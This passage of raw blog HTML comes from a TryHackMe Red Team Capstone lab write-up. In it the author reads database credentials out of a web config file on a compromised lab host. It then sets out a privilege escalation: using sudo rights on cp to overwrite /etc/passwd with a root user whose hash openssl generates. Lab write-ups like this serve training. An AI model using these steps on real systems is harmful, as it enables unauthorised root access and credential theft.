768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?resize=1536%2C368&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?w=1943&amp;ssl=1 1943w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Great! We got the shell on the VPN machine. <\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"22-connecting-to-mysql-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Connecting to MySQL<\/mark><\/h4>\n\n\n\n<p>In the <code>\/var\/www\/html<\/code> directory, we notice that there is a Database connection configuration file. These files contain credentials to the databases. Reading the file, we do see the credentials to connect to the MySQL server.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"www-data@ip-10-200-113-12:\/var\/www\/html$ cat db_connect.php \n&lt;?php\n\ndefine('DB_SRV', 'localhost');\ndefine('DB_PASSWD', &quot;password1!&quot;);\ndefine('DB_USER', 'vpn');\ndefine('DB_NAME', 'vpn');\n\n$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);\n\nif($connection == false){\n\n\tdie(&quot;Error: Connection to Database could not be made.&quot; . mysqli_connect_error());\n}\n?&gt;\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">www-data@ip-10-200-113-12:\/var\/www\/html$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cat<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">db_connect.php<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;?<\/span><span style=\"color: #BABED8\">php<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">define(<\/span><span style=\"color: #FFCB6B\">&#39;DB_SRV&#39;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">localhost<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\">)<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">define(<\/span><span style=\"color: #FFCB6B\">&#39;DB_PASSWD&#39;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">password1!<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\">)<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">define(<\/span><span style=\"color: #FFCB6B\">&#39;DB_USER&#39;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">vpn<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\">)<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">define(<\/span><span style=\"color: #FFCB6B\">&#39;DB_NAME&#39;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">vpn<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\">)<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">$connection = mysqli_connect<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">DB_SRV,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DB_USER,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DB_PASSWD,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DB_NAME<\/span><span style=\"color: #89DDFF\">);<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">if<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #BABED8\">$connection == false<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #FFCB6B\">die(<\/span><span style=\"color: #FFCB6B\">&quot;Error: Connection to Database could not be made.&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mysqli_connect_error<\/span><span style=\"color: #89DDFF\">()<\/span><span style=\"color: #BABED8\">)<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">?&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910c5bb&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910c5bb\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"426\" data-attachment-id=\"479\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206143435\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?fit=1407%2C586&amp;ssl=1\" data-orig-size=\"1407,586\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206143435\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?fit=1024%2C426&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?resize=1024%2C426&#038;ssl=1\" alt=\"\" class=\"wp-image-479\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?resize=1024%2C426&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?resize=300%2C125&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?resize=768%2C320&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?w=1407&amp;ssl=1 1407w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>From the VPN machine itself, we can connect via MySQL and check out the database.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"www-data@ip-10-200-113-12:\/var\/www\/html$ mysql -u vpn -p\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">www-data@ip-10-200-113-12:\/var\/www\/html$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mysql<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">vpn<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The <code>vpn<\/code> database has a <code>users<\/code> table that contains a set of credentials for the user <code>lisa.moore<\/code>. We will add these credentials to our list of found credentials and use them later if needed.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910dad8&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910dad8\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"610\" data-attachment-id=\"480\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206163250\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?fit=1217%2C725&amp;ssl=1\" data-orig-size=\"1217,725\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206163250\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?fit=1024%2C610&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?resize=1024%2C610&#038;ssl=1\" alt=\"\" class=\"wp-image-480\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?resize=1024%2C610&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?resize=300%2C179&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?resize=768%2C458&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?w=1217&amp;ssl=1 1217w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"23-privilege-escalation-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Privilege Escalation<\/mark><\/h4>\n\n\n\n<p>The VPN machine is our foothold on the network. We can set up pivoting and interact with the machines on the Internal network directly from our kali (attack) machine. Getting the <code>root<\/code> access will give us elevated privileges on the machine and if needed we will be able to install\/compile\/run the tools without any restrictions.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>For Pivoting, privilege escalation is not required. We will try to compromise as much as we can to showcase the vulnerabilities and misconfigurations on the machine.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Checking for the <code>SUDO<\/code> permissions, we notice that the user <code>www-data<\/code> can run a bash script and <code>cp<\/code> binary with elevated access. We can make use of this to our advantage and get root access.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910eb5e&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910eb5e\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"162\" data-attachment-id=\"481\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206143634\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?fit=1536%2C243&amp;ssl=1\" data-orig-size=\"1536,243\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206143634\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?fit=1024%2C162&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?resize=1024%2C162&#038;ssl=1\" alt=\"\" class=\"wp-image-481\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?resize=1024%2C162&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?resize=300%2C47&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?resize=768%2C122&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?w=1536&amp;ssl=1 1536w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The <code>cp<\/code> binary is used to copy files. We are currently <code>www-data<\/code> user who is a default user for web servers and does not have any elevated privileges by default. But with SUDO permissions on the cp binary, we can copy any files that only root the user can access and read them.<\/p>\n\n\n\n<p>One easy way to become root on the machine using the SUDO permissions on <code>\/bin\/cp<\/code> is to modify the <code>\/etc\/passwd<\/code> file. We will first copy the passwd file to <code>\/tmp<\/code> directory, add our own user with root privileges, and then copy the file back to its original path.<\/p>\n\n\n\n<p>We will create a hash in the format that is required by the <code>passwd<\/code> file.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone]\n\u2514\u2500$ openssl passwd -1 -salt ignite pass123\n$1$ignite$3eTbJm98O9Hz.k1NTdNxe1\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">openssl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">passwd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-salt<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ignite<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">pass123<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8; font-style: italic\">$1<\/span><span style=\"color: #BABED8\">$ignite$3eTbJm98O9Hz.k1NTdNxe1<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Now, we append our user hash to the <code>passwd<\/code> file,<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910f70c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910f70c\" class=\"wp-block-image size-large wp-lightbox-container\"><img 